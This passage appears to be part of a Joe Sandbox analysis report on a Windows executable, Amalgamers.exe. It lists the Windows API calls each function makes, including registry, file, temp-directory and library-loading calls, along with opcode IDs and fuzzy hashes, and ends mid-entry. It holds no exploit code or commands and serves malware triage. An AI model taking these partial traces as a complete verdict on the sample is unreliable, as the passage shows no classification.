                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CloseValuelstrlen
                                        • String ID:
                                        • API String ID: 2655323295-0
                                        • Opcode ID: 9b4603d551612266685cde4e1ab5df1b2e55abde835717a16c608a83efa67158
                                        • Instruction ID: 52a398de0ffa64e75c678b0ba9290c89a7bc7a6ef294ba5bc2d5d90b06733894
                                        • Opcode Fuzzy Hash: 9b4603d551612266685cde4e1ab5df1b2e55abde835717a16c608a83efa67158
                                        • Instruction Fuzzy Hash: C8118171E00215BEEB10EFA59E49AAEBA74EB54318F20843BF504F71D1CAB94D419B68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 716 402473-402478 call 402b0b 718 40247d-40248a call 402acb 716->718 721 402490-4024ae RegQueryValueExA 718->721 722 40271c-402723 718->722 723 4024b0-4024b4 721->723 724 4024de-4024e3 721->724 725 402957-402966 722->725 727 4024b6-4024b9 723->727 728 4024c9-4024dc call 405efe 723->728 726 402541-402548 RegCloseKey 724->726 726->722 726->725 731 4024c1-40253b 727->731 732 4024bb-4024bf 727->732 728->726 731->726 732->724 732->731
                                        APIs
                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                        • RegCloseKey.ADVAPI32(?,?,?,0040AC18,00000000,00000011,00000002), ref: 00402542
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 339b0f58268b4c7f9437df92a49e2b39a987b7be1543b21b52b8f9d41d406249
                                        • Instruction ID: 95e09d1afac246f862a709281cbe64e29327228dc2655ecd66478bf0894335ce
                                        • Opcode Fuzzy Hash: 339b0f58268b4c7f9437df92a49e2b39a987b7be1543b21b52b8f9d41d406249
                                        • Instruction Fuzzy Hash: 9811A371A01205FFDB15DF64DA989AEBBB4DF10348F20843FE445B72C0D6B84A85DB69
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                        • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                                        • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                        • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                          • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                          • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                          • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                        • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                                        • Opcode Fuzzy Hash: 8b993a8f6eb8e905ca30c67f896f6c6ad868427c201d07e664c6abec48b1d465
                                        • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\Amalgamers.exe,80000000,00000003), ref: 00405B3D
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                        • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                        • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                        • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405B2D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                        • Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
                                        • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                        • Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                        • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                                        • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                        • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                        • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                        • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                        • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                                        • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                        • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                        • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                                        • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                        • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Execute: ), ref: 00405E4A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                        • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                        • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                                        APIs
                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: c83c83ea3c187ec2e5b5282ce166bf8f6b0eb1a8c5f39d84dce50b7dd6167720
                                        • Instruction ID: 16624c16aa0e128540259aec7752c58df5b2033d878da01750b81a807d48f065
                                        • Opcode Fuzzy Hash: c83c83ea3c187ec2e5b5282ce166bf8f6b0eb1a8c5f39d84dce50b7dd6167720
                                        • Instruction Fuzzy Hash: 73D012727041129BCB10EBE89B489DEB7A49B50328B308537D111F31D1D6B98A45A72D
                                        APIs
                                        • SendMessageA.USER32(00010444,00000000,00000000,00000000), ref: 0040409D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                        • Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
                                        • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                        • Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1669510459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1669498435.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669527340.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669539989.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1669643783.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Amalgamers.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                        • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                        • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
